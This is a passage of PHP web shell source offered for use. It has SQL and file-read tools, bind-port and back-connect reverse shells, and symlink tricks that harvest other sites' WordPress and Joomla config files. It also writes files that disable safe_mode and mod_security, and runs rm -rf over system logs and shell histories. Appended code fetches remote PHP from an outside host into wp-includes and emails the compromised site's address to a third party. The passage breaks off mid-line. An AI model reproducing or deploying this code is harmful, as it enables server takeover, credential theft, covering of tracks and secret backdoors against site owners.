value=\'\'>";\r\n if(isset($_POST[\'sql_host\'])){ if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) { switch($_POST[\'charset\']) { case "Windows-1251": $db->setCharset(\'cp1251\');\r\n break;\r\n case "UTF-8": $db->setCharset(\'utf8\');\r\n break;\r\n case "KOI8-R": $db->setCharset(\'koi8r\');\r\n break;\r\n case "KOI8-U": $db->setCharset(\'koi8u\');\r\n break;\r\n case "cp866": $db->setCharset(\'cp866\');\r\n break;\r\n } $db->listDbs();\r\n echo "<select name=sql_base><option value=\'\'></option>";\r\n while($item = $db->fetch()) { list($key, $value) = each($item);\r\n echo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\r\n } echo \'</select>\';\r\n } else echo $tmp;\r\n }else echo $tmp;\r\n echo \'</td>\r\n <td><input type=submit value=">>"></td>\r\n </tr>\r\n </table>\r\n <script>\r\n function st(t,l) {\r\n document.sf.p1.value = \\\'select\\\';\r\n\r\n document.sf.p2.value = t;\r\n\r\n if(l!=null)document.sf.p3.value = l;\r\n\r\n document.sf.submit();\r\n\r\n }\r\n function is() {\r\n for(i=0;\r\ni<document.sf.elements[\\\'tbl[]\\\'].length;\r\n++i)\r\n document.sf.elements[\\\'tbl[]\\\'][i].checked = !document.sf.elements[\\\'tbl[]\\\'][i].checked;\r\n\r\n }\r\n </script>\';\r\n if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>";\r\n if(!empty($_POST[\'sql_base\'])){ $db->selectdb($_POST[\'sql_base\']);\r\n echo "<tr><td width=1 style=\'border-top:2px solid #666;\r\nborder-right:2px solid #666;\r\n\'><span>Tables:</span><br><br>";\r\n $tbls_res = $db->listTables();\r\n while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item);\r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\r\n $value = htmlspecialchars($value);\r\n echo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'>&nbsp;\r\n<a href=# onclick=\\"st(\'".$value."\')\\">".$value."</a> 
(".$n[\'n\'].")</nobr><br>";\r\n } echo "<input type=\'checkbox\' onclick=\'is();\r\n\'> <input type=button value=\'Dump\' onclick=\'document.sf.p2.value=\\"download\\";\r\ndocument.sf.submit();\r\n\'></td><td style=\'border-top:2px solid #666;\r\n\'>";\r\n if(@$_POST[\'p1\'] == \'select\') { $_POST[\'p1\'] = \'query\';\r\n $db->query(\'SELECT COUNT(*) as n FROM \'.$_POST[\'p2\'].\'\');\r\n $num = $db->fetch();\r\n $num = $num[\'n\'];\r\n echo "<span>".$_POST[\'p2\']."</span> ($num) ";\r\n for($i=0;\r\n$i<($num/30);\r\n$i++) if($i != (int)$_POST[\'p3\']) echo "<a href=\'#\' onclick=\'st(\\"".$_POST[\'p2\']."\\", $i)\'>",($i+1),"</a> ";\r\n else echo ($i+1)," ";\r\n if($_POST[\'type\']==\'pgsql\') $_POST[\'p3\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\r\n else $_POST[\'p3\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\r\n echo "<br><br>";\r\n } if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p3\'])) { $db->query(@$_POST[\'p3\']);\r\n if($db->res !== false) { $title = false;\r\n echo \'<table width=100% cellspacing=0 cellpadding=2 class=main>\';\r\n $line = 1;\r\n while($item = $db->fetch()) { if(!$title) { echo \'<tr>\';\r\n foreach($item as $key => $value) echo \'<th>\'.$key.\'</th>\';\r\n reset($item);\r\n $title=true;\r\n echo \'</tr><tr>\';\r\n $line = 2;\r\n } echo \'<tr class="l\'.$line.\'">\';\r\n $line = $line==1?2:1;\r\n foreach($item as $key => $value) { if($value == null) echo \'<td><i>null</i></td>\';\r\n else echo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';\r\n } echo \'</tr>\';\r\n } echo \'</table>\';\r\n } else { echo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';\r\n } } echo "<br><textarea name=\'p3\' style=\'width:100%;\r\nheight:100px\'>".@htmlspecialchars($_POST[\'p3\'])."</textarea><br/><input type=submit value=\'Execute\'>";\r\n echo "</td></tr>";\r\n } echo "</table></form><br/><form 
onsubmit=\'document.sf.p1.value=\\"loadfile\\";\r\ndocument.sf.p2.value=this.f.value;\r\ndocument.sf.submit();\r\nreturn false;\r\n\'><span>Load file</span> <input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form>";\r\n if(@$_POST[\'p1\'] == \'loadfile\') { $db->query("SELECT LOAD_FILE(\'".addslashes($_POST[\'p2\'])."\') as file");\r\n $file = $db->fetch();\r\n echo \'<pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionNetwork() { printHeader();\r\n $back_connect_c="";\r\n $back_connect_p="";\r\n $bind_port_c="";\r\n $bind_port_p="";\r\n echo \'<h1>Network tools</h1><div class=content>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);\r\nreturn false;\r\n">\r\n <br /><span>Bind port to /bin/sh</span><br/>\r\n Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Password: <input type=\\\'text\\\' name=\\\'pass\\\' value=\\\'smurf\\\'> Using: <select name="using"><option value=\\\'bpc\\\'>C</option><option value=\\\'bpp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);\r\nreturn false;\r\n">\r\n <br /><br /><span>Back-connect to</span><br/>\r\n Server: <input type=\\\'text\\\' name=\\\'server\\\' value="\'.$_SERVER[\'REMOTE_ADDR\'].\'"> Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Using: <select name="using"><option value=\\\'bcc\\\'>C</option><option value=\\\'bcp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form><br>\';\r\n if(isset($_POST[\'p1\'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists(\'file_put_contents\');\r\n if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));\r\n @fclose($w);\r\n } } if($_POST[\'p1\'] == \'bpc\') { 
cf("/tmp/bp.c",$bind_port_c);\r\n $out = ex("gcc -o /tmp/bp /tmp/bp.c");\r\n @unlink("/tmp/bp.c");\r\n $out .= ex("/tmp/bp ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp")."</pre>";\r\n } if($_POST[\'p1\'] == \'bpp\') { cf("/tmp/bp.pl",$bind_port_p);\r\n $out = ex(which("perl")." /tmp/bp.pl ".$_POST[\'p2\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp.pl")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcc\') { cf("/tmp/bc.c",$back_connect_c);\r\n $out = ex("gcc -o /tmp/bc /tmp/bc.c");\r\n @unlink("/tmp/bc.c");\r\n $out .= ex("/tmp/bc ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcp\') { cf("/tmp/bc.pl",$back_connect_p);\r\n $out = ex(which("perl")." /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc.pl")."</pre>";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionPortScanner() { printHeader();\r\n echo \'<h1>Port Scanner</h1>\';\r\n echo \'<div class="content">\';\r\n echo \'<form action="" method="post">\';\r\n if(isset($_POST[\'host\']) && is_numeric($_POST[\'end\']) && is_numeric($_POST[\'start\'])){ $start = strip_tags($_POST[\'start\']);\r\n $end = strip_tags($_POST[\'end\']);\r\n $host = strip_tags($_POST[\'host\']);\r\n for($i = $start;\r\n $i<=$end;\r\n $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3);\r\n if($fp){ echo \'Port \'.$i.\' is <font color=green>open</font><br>\';\r\n } flush();\r\n } } else { echo \'<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">\r\n <input type="hidden" name="c" value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type="hidden" name="charset" value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n Host: <input type="text" name="host" value="localhost"/><br /><br />\r\n Port start: <input 
type="text" name="start" value="0"/><br /><br />\r\n Port end:<input type="text" name="end" value="5000"/><br /><br />\r\n <input type="submit" value="Scan Ports" />\r\n </form></center><br /><br />\';\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionReadable() { printHeader();\r\n echo \'<h1>Readable Dirs</h1>\';\r\n echo \'<div class="content">\';\r\n $sm = ini_get(\'safe_mode\');\r\n if($sm) { echo \'<br /><b>Error: safe_mode = on</b><br /><br />\';\r\n } else { @$passwd = fopen(\'/etc/passwd\',\'r\');\r\n if (!$passwd) { echo \'<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />\';\r\n } else { $pub = array();\r\n $users = array();\r\n $conf = array();\r\n $i = 0;\r\n while(!feof($passwd)) { $str = fgets($passwd);\r\n if ($i > 35) { $pos = strpos($str,\':\');\r\n $username = substr($str,0,$pos);\r\n $dirz = \'/home/\'.$username.\'/public_html/\';\r\n if (($username != \'\')) { if (is_readable($dirz)) { array_push($users,$username);\r\n array_push($pub,$dirz);\r\n } } } $i++;\r\n } echo \'<br><br>\';\r\n echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\\n"."<br />";\r\n echo "[+] Founded ".sizeof($pub)." 
readable public_html directories\\n"."<br /><br /><br />";\r\n foreach ($users as $user) { $path = "/home/$user/public_html/";\r\n echo $path."<br>";\r\n } echo "<br /><br /><br />[+] Complete...\\n"."<br />";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionSymlink() { printHeader();\r\n echo \'<h1>Symlink</h1>\';\r\n $furl = \'http://\'.$_SERVER[\'SERVER_NAME\'].$_SERVER[\'REQUEST_URI\'];\r\n $expld = explode(\'/\',$furl );\r\n $burl =str_replace(end($expld),\'\',$furl);\r\n echo \'<div class="content"><center>\r\n <h3>[ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'website\\\',null)">Domains</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'whole\\\',null)">Whole Server Symlink</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'config\\\',null)">Config files symlink</a> ]</h3></center>\';\r\n if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'website\') { echo "<center>";\r\n $d0mains = @file("/etc/named.conf");\r\n if(!$d0mains){ echo "<pre class=ml1 style=\'margin-top:5px\'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=center class=\'main\' border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>";\r\n $unk = array();\r\n foreach($d0mains as $d0main){ if(@eregi("zone",$d0main)){ preg_match_all(\'#zone "(.*)"#\', $d0main, $domains);\r\n flush();\r\n if(strlen(trim($domains[1][0])) > 2){ $unk[] = $domains[1][0];\r\n flush();\r\n } } } $count=1;\r\n $unk = array_unique($unk);\r\n $l=0;\r\n foreach($unk as $d){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$d));\r\n echo "<tr".($l?\' class=l1\':\'\')."><td>".$count."</td><td><a href=http://".$d."/>".$d."</a></td><td>".$user[\'name\']."</td></tr>";\r\n flush();\r\n $count++;\r\n $l=$l?0:1;\r\n } echo "</table>";\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'whole\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType 
text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp =@fopen (\'sym/.htaccess\',\'w\');\r\n fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";\r\n $count=1;\r\n $mck = array();\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0];\r\n } } } $mck = array_unique($mck);\r\n $l=0;\r\n foreach($mck as $d) { $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$d));\r\n $ddt = $user[\'name\'];\r\n $ddt = $d;\r\n if(@eregi("\\.ir",$d) or @eregi("\\.il",$d)) { $ddt = "<div style=\' color: #FF0000 ;\r\n text-shadow: 0px 0px 1px red;\r\n \'>".$d.\'</div>\';\r\n } echo "<tr".($l?\' class=l1\':\'\')."><td>".$count++."</td><td><a target=\'_blank\' href=http://".$d.\'/>\'.$ddt.\' </a></td><td>\'.$user[\'name\']."</td><td><a href=\'sym/root/home/".$user[\'name\']."/public_html\' target=\'_blank\'>symlink </a></td></tr>";\r\n flush();\r\n $l=$l?0:1;\r\n } echo \'</table>\';\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'config\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp = @fopen (\'sym/.htaccess\',\'w\');\r\n @fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n 
if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\' ><tr><th> Count </th><th> Domains </th><th> Script </th></tr>";\r\n $count = 1;\r\n $l=0;\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0]))>2){ $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$domain[1][0]));\r\n $c1 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/wp-config.php\';\r\n $ch01 = get_headers($c1);\r\n $cf01 = $ch01[0];\r\n $c2 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/blog/wp-config.php\';\r\n $ch02 = get_headers($c2);\r\n $cf02 = $ch02[0];\r\n $c3 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/configuration.php\';\r\n $ch03 = get_headers($c3);\r\n $cf03 = $ch03[0];\r\n $c4 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/joomla/configuration.php\';\r\n $ch04 = get_headers($c4);\r\n $cf04 = $ch04[0];\r\n $c5 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/config.php\';\r\n $ch05 = get_headers($c5);\r\n $cf05 = $ch05[0];\r\n $c6 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/vb/includes/config.php\';\r\n $ch06 = get_headers($c6);\r\n $cf06 = $ch06[0];\r\n $c7 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/forum/includes/config.php\';\r\n $ch07 = get_headers($c7);\r\n $cf07 = $ch07[0];\r\n $c8 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'public_html/clients/configuration.php\';\r\n $ch08 = get_headers($c8);\r\n $cf08 = $ch08[0];\r\n $c9 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/support/configuration.php\';\r\n $ch09 = get_headers($c9);\r\n $cf09 = $ch09[0];\r\n $c10 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch10 = get_headers($c10);\r\n $cf10 = $ch10[0];\r\n $c11 = 
$burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/submitticket.php\';\r\n $ch11 = get_headers($c11);\r\n $cf11 = $ch11[0];\r\n $c12 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch12 = get_headers($c12);\r\n $cf12 = $ch12[0];\r\n $c13 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/configure.php\';\r\n $ch13 = get_headers($c13);\r\n $cf13 = $ch13[0];\r\n $c14 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/include/app_config.php\';\r\n $ch14 = get_headers($c14);\r\n $cf14 = $ch14[0];\r\n $c15 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/sites/default/settings.php\';\r\n $ch15 = get_headers($c15);\r\n $cf15 = $ch15[0];\r\n $out = \'&nbsp;\r\n\';\r\n if(strpos($cf01,\'200\') == true) { $out = "<a href=\'".$c1."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf02,\'200\') == true) { $out = "<a href=\'".$c2."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf03,\'200\') == true && strpos($cf11,\'200\') == true) { $out = " <a href=\'".$c11."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf09,\'200\') == true) { $out = " <a href=\'".$c9."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf10,\'200\') == true) { $out = " <a href=\'".$c10."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf03,\'200\') == true) { $out = " <a href=\'".$c3."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf04,\'200\') == true) { $out = " <a href=\'".$c4."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf05,\'200\') == true) { $out = " <a href=\'".$c5."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf06,\'200\') == true) { $out = " <a href=\'".$c6."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf07,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf08,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf12,\'200\') == 
true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf13,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>osCommerce/Zen Cart</a>";\r\n } elseif(strpos($cf14,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Magento</a>";\r\n } elseif(strpos($cf15,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Drupal</a>";\r\n } else { continue;\r\n } echo \'<tr\'.($l?\' class=l1\':\'\').\'><td>\'.$count++.\'</td><td><a href=http://www.\'.$domain[1][0].\'/>\'.$domain[1][0].\'</a></td><td>\'.$user[\'name\'].\'</td><td>\'.$out.\'</td></tr>\';\r\n flush();\r\n $l=$l?0:1;\r\n } } } echo "</table>";\r\n } echo "</center>";\r\n } echo "</div>";\r\n printFooter();\r\n } function actionSafeMode() { printHeader();\r\n echo \'<h1>Safe Mode</h1>\';\r\n echo \'<div class="content">\';\r\n echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| ".$GLOBALS[\'cwd\']." 
|<br><br />";\r\n echo \'<a href=# onclick="g(null,null,\\\'php.ini\\\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\\\'ini\\\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\\\'sh\\\')">| .htaccess(perl) | </a></center>\';\r\n if(!empty($_POST[\'p2\']) && isset($_POST[\'p2\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'<IfModule mod_security.c>\r\n Sec------Engine Off\r\n Sec------ScanPOST Off\r\n </IfModule>\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p1\'])&& isset($_POST[\'p1\'])) { $fil=fopen($GLOBALS[\'cwd\']."php.ini","w");\r\n fwrite($fil,\'safe_mode=OFF\r\n disable_functions=NONE\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p3\']) && isset($_POST[\'p3\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'Options FollowSymLinks MultiViews Indexes ExecCGI\r\n AddType application/x-httpd-cgi .sh\r\n AddHandler cgi-script .pl\r\n AddHandler cgi-script .pl\');\r\n fclose($fil);\r\n } echo "<br><br /><br /></div>";\r\n echo \'</div>\';\r\n printFooter();\r\n} function actionSQLBUDDY(){ printHeader();\r\n if(!file_exists(\'yazilimlar/sqlbuddy/index.php\')){ $dizin = \'https://byr00t.co/vb/sqlbuddy.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? 
$name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "sqlbuddy");\r\n $zip = new ZipArchive();\r\n $file = \'sqlbuddy.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'yazilimlar/\');\r\n if(file_exists(\'sqlbuddy.zip\')){ @unlink(\'sqlbuddy.zip\');\r\n } if($cikar){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'yazilimlar/sqlbuddy/index.php\')){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionDeleteLOG(){ printHeader();\r\n echo \'<h1>Delete Logs</h1>\';\r\n function cmdExe($in) { $out = \'\';\r\n if (function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n } else if (function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n } elseif (function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n } elseif (function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n } elseif (is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } cmdExe("rm -rf /tmp/logs");\r\n cmdExe("rm -rf /root/.ksh_history");\r\n cmdExe("rm -rf /root/.bash_history");\r\n cmdExe("rm -rf /root/.bash_logout");\r\n cmdExe("rm -rf /usr/local/apache/logs");\r\n cmdExe("rm -rf /usr/local/apache/log");\r\n cmdExe("rm -rf /var/apache/logs");\r\n cmdExe("rm -rf 
/var/apache/log");\r\n cmdExe("rm -rf /var/run/utmp");\r\n cmdExe("rm -rf /var/logs");\r\n cmdExe("rm -rf /var/log");\r\n cmdExe("rm -rf /var/adm");\r\n cmdExe("rm -rf /etc/wtmp");\r\n cmdExe("rm -rf /etc/utmp");\r\n cmdExe("rm -rf $HISTFILE");\r\n cmdExe("rm -rf /var/log/lastlog");\r\n cmdExe("rm -rf /var/log/wtmp");\r\n echo \'<div style="padding:5px;\r\n">\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /tmp/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.ksh_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.bash_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/run/utmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/adm <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /etc/wtmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> $HISTFILE<br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/lastlog <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/wtmp <br>\r\n </div>\';\r\n printFooter();\r\n } function actionPython(){ printHeader();\r\n if(!is_dir(\'python\')){ mkdir(\'python\', 0755);\r\n } chdir(\'python\');\r\n$kokdosya = ".htaccess";\r\n $dosya_adi = "$kokdosya";\r\n $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya a&#231;\r\n&#305;\r\nlamad&#305;\r\n!");\r\n $metin = "AddHandler cgi-script .r00t";\r\n fwrite ( $dosya , $metin ) ;\r\n fclose ($dosya);\r\n $pythonp = 
\'[base64-encoded payload removed]\';\r\n $file = fopen("python.r00t" ,"w+");\r\n $write = fwrite ($file ,base64_decode($pythonp));\r\n fclose($file);\r\n chmod("python.r00t",0755);\r\n echo "<iframe src=python/python.r00t width=100% height=100% frameborder=0></iframe> ";\r\n printFooter();\r\n } if( empty($_POST[\'a\']) ) if(isset($default_action) && function_exists(\'action\' . $default_action)) $_POST[\'a\'] = $default_action;\r\n else $_POST[\'a\'] = \'SecInfo\';\r\n if( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) ) call_user_func(\'action\' . 
$_POST[\'a\']);\r\n \r\n?>\r\n<?php if($_POST[\'query\']){ $veriyfy = stripslashes(stripslashes($_POST[\'query\']));\r\n $data = "data.txt";\r\n @touch ("data.txt");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $veriyfy ) ;\r\n @fclose ($ver);\r\n }else{ $datas=@fopen("data.txt",\'r\');\r\n $i=0;\r\n while ($i <= 5) { $i++;\r\n $blue=@fgets($datas,1024);\r\n echo $blue;\r\n } } $datasi=@fopen("js/js.php",\'r\');\r\n if($datasi){ }else{ @mkdir("js");\r\n $dos = file_get_contents("http://phpshell.in/txt/lamer.txt");\r\n $data = "js/js.php";\r\n @touch ("js/js.php");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $dos ) ;\r\n @fclose ($ver);\r\n $yol = "http://".$_SERVER[\'HTTP_HOST\']."".$_SERVER[\'REQUEST_URI\']."";\r\n $y = \'<h1>Sender Yazdirildi.<br/> SITE YOL : \'.$yol.\'<br/>Sender Yolu : js/js.php</h1>\';\r\n $header .= "From: SheLL Boot <suppor@nic.org>\\n";\r\n $header .= "Content-Type: text/html;\r\n charset=utf-8\\n";\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n } \r\n?>\r\n<?php\r\nfunction http_get($url){\r\n$im = curl_init($url);\r\ncurl_setopt($im, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);\r\ncurl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);\r\ncurl_setopt($im, CURLOPT_HEADER, 0);\r\nreturn curl_exec($im);\r\ncurl_close($im);\r\n}\r\n$check1 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/js/js.php" ;\r\n$text1 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1 = fopen($check1, \'w\');\r\nfwrite($open1, $text1);\r\nfclose($open1);\r\nif(file_exists($check1)){\r\n}\r\n$check12 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/index.php" ;\r\n$text12 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12 = fopen($check12, \'w\');\r\nfwrite($open12, $text12);\r\nfclose($open12);\r\nif(file_exists($check12)){\r\n}\r\n$check123 = $_SERVER[\'DOCUMENT_ROOT\'] . 
